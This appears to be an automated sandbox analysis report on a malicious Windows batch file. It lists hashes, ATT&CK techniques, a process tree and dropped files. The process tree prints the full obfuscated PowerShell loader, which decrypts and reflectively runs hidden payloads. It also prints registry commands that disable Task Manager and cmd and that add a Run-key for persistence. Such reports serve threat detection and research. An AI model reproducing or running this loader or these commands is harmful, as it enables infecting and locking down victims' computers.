d9a2b84c3e8cf02f3d3fb7356c6d441dc7f0ff1065049bfe45934180c6be8d05

General

Target

Msi Config.bat
Size

2.3MB
MD5

1e914a539f872fe4fd2d7da4f8e4a4b8
SHA1

f064a29af9f6f14da4b4e1118c9a29b59ef5f682
SHA256

d9a2b84c3e8cf02f3d3fb7356c6d441dc7f0ff1065049bfe45934180c6be8d05
SHA512

e286ff0f51d53302c3fced2dc7f4ae9dd94f698fab1532ef2a55c33b4890a610c200597c526fb8607850b2a986812cacf30bef03fa5d9c4f5f6c399c06c14edd
SSDEEP

49152:hrC9ycihw/wF56sLdvUrtiQU3L4stTKerWQVsk:sk

Score

8^/10

discovery evasion execution persistence

Malware Config

Signatures

Disables Task Manager via registry modification
evasion

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	wscript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\rundll32 .exe"	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1536	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	REG.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rEG.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wscript.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1124	rEG.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
1536	powershell.exe
1536	powershell.exe
1536	powershell.exe
1536	powershell.exe
1536	powershell.exe
1536	powershell.exe
1536	powershell.exe
1536	powershell.exe
1536	powershell.exe
1536	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1536	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 4832 wrote to memory of 1536	4832	cmd.exe	88
PID 4832 wrote to memory of 1536	4832	cmd.exe	88
PID 4832 wrote to memory of 1536	4832	cmd.exe	88
PID 1536 wrote to memory of 2016	1536	powershell.exe	94
PID 1536 wrote to memory of 2016	1536	powershell.exe	94
PID 1536 wrote to memory of 2016	1536	powershell.exe	94
PID 1536 wrote to memory of 4420	1536	powershell.exe	96
PID 1536 wrote to memory of 4420	1536	powershell.exe	96
PID 1536 wrote to memory of 4420	1536	powershell.exe	96
PID 1536 wrote to memory of 1124	1536	powershell.exe	97
PID 1536 wrote to memory of 1124	1536	powershell.exe	97
PID 1536 wrote to memory of 1124	1536	powershell.exe	97
PID 2016 wrote to memory of 1156	2016	cmd.exe	98
PID 2016 wrote to memory of 1156	2016	cmd.exe	98
PID 2016 wrote to memory of 1156	2016	cmd.exe	98
PID 1156 wrote to memory of 4092	1156	wscript.exe	99
PID 1156 wrote to memory of 4092	1156	wscript.exe	99
PID 1156 wrote to memory of 4092	1156	wscript.exe	99

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Msi Config.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4832
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rn1hZDs/4U0BsBRi9y46eXfL3OCT0WAu9wBq9nT2OaA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k6ffxuXTXkacVwxnadjdNA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $kZwph=New-Object System.IO.MemoryStream(,$param_var); $sOaru=New-Object System.IO.MemoryStream; $cTJdl=New-Object System.IO.Compression.GZipStream($kZwph, [IO.Compression.CompressionMode]::Decompress); $cTJdl.CopyTo($sOaru); $cTJdl.Dispose(); $kZwph.Dispose(); $sOaru.Dispose(); $sOaru.ToArray();}function execute_function($param_var,$param2_var){ $lbbAA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eBxyl=$lbbAA.EntryPoint; $eBxyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Msi Config.bat';$BsoNF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Msi Config.bat').Split([Environment]::NewLine);foreach ($TmLcO in $BsoNF) { if ($TmLcO.StartsWith(':: ')) { $JBYjA=$TmLcO.Substring(3); break; }}$payloads_var=[string[]]$JBYjA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Drops file in Drivers directory
  - Adds Run key to start application
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\java.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2016
  - - C:\Windows\SysWOW64\wscript.exe
      wscript.exe "C:\Users\Admin\AppData\Local\Temp\invs.vbs" "C:\Users\Admin\AppData\Local\Temp\java2.bat
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1156
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\java2.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4092
- - C:\Windows\SysWOW64\REG.exe
    REG add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4420
- - C:\Windows\SysWOW64\rEG.exe
    rEG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:1124

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tmzmcxni.gpu.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\invs.vbs

Filesize
78B

MD5
c578d9653b22800c3eb6b6a51219bbb8

SHA1
a97aa251901bbe179a48dbc7a0c1872e163b1f2d

SHA256
20a98a7e6e137bb1b9bd5ef6911a479cb8eac925b80d6db4e70b19f62a40cce2

SHA512
3ae6dc8f02d1a78e1235a0782b632972da5a74ab32287cc41aa672d4fa4a9d34bb5fc50eba07b6915f2e61c402927cd5f6feeb7f7602afa2f64e91efb3b7fc4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\java.bat

Filesize
47B

MD5
81bf5400486e5da45ba0c6c1399d843f

SHA1
d70a7c4d3f3057a3ef5b8b1c764b40b3d3b4d59d

SHA256
d1a915a5e0286b1648a6e094f52813e2b5766dce3acf6342b297f7ca113545f1

SHA512
ebeee9eb5249ee1b278bf6c1fbcd91e4c073a241203f218dfa2edfa708a37679c6e6a78751de55b4640a024b32ce4389bd5d931401309163950cd15b4a91c140

Download Submit
C:\Users\Admin\AppData\Local\Temp\java2.bat

Filesize
151B

MD5
ed28c618f7d8306e3736432b58bb5d27

SHA1
441e6dab70e31d9c599fcd9e2d32009038781b42

SHA256
d9aa03911260779b1f8a9b046a7ecf7aa87b0f13c762491fe8e06c482bac09a3

SHA512
4257d8839e881a9ab6de6230a9df1e81456cb796eb9ee2361789fa5fe4c81b297ed1c472f91d97bb0b2ebdb6acadb924617e6ffd32fc96d8ddcebf8fee4a7880

Download Submit
memory/1536-20-0x0000000008560000-0x0000000008BDA000-memory.dmp

Filesize
6.5MB

Download
memory/1536-23-0x0000000008030000-0x00000000081F2000-memory.dmp

Filesize
1.8MB

Download
memory/1536-7-0x00000000056B0000-0x0000000005716000-memory.dmp

Filesize
408KB

Download
memory/1536-6-0x0000000005640000-0x00000000056A6000-memory.dmp

Filesize
408KB

Download
memory/1536-3-0x00000000751E0000-0x0000000075990000-memory.dmp

Filesize
7.7MB

Download
memory/1536-13-0x0000000005810000-0x0000000005B64000-memory.dmp

Filesize
3.3MB

Download
memory/1536-18-0x0000000005D10000-0x0000000005D2E000-memory.dmp

Filesize
120KB

Download
memory/1536-19-0x0000000005D40000-0x0000000005D8C000-memory.dmp

Filesize
304KB

Download
memory/1536-0-0x00000000751EE000-0x00000000751EF000-memory.dmp

Filesize
4KB

Download
memory/1536-21-0x00000000062F0000-0x000000000630A000-memory.dmp

Filesize
104KB

Download
memory/1536-22-0x0000000004B50000-0x0000000004B58000-memory.dmp

Filesize
32KB

Download
memory/1536-5-0x00000000055A0000-0x00000000055C2000-memory.dmp

Filesize
136KB

Download
memory/1536-24-0x000000000DBE0000-0x000000000DF8A000-memory.dmp

Filesize
3.7MB

Download
memory/1536-25-0x0000000008290000-0x000000000832C000-memory.dmp

Filesize
624KB

Download
memory/1536-27-0x000000000E540000-0x000000000EAE4000-memory.dmp

Filesize
5.6MB

Download
memory/1536-4-0x00000000751E0000-0x0000000075990000-memory.dmp

Filesize
7.7MB

Download
memory/1536-2-0x0000000004EF0000-0x0000000005518000-memory.dmp

Filesize
6.2MB

Download
memory/1536-1-0x0000000002530000-0x0000000002566000-memory.dmp

Filesize
216KB

Download
memory/1536-41-0x00000000751EE000-0x00000000751EF000-memory.dmp

Filesize
4KB

Download
memory/1536-42-0x00000000751E0000-0x0000000075990000-memory.dmp

Filesize
7.7MB

Download
memory/1536-46-0x00000000751E0000-0x0000000075990000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads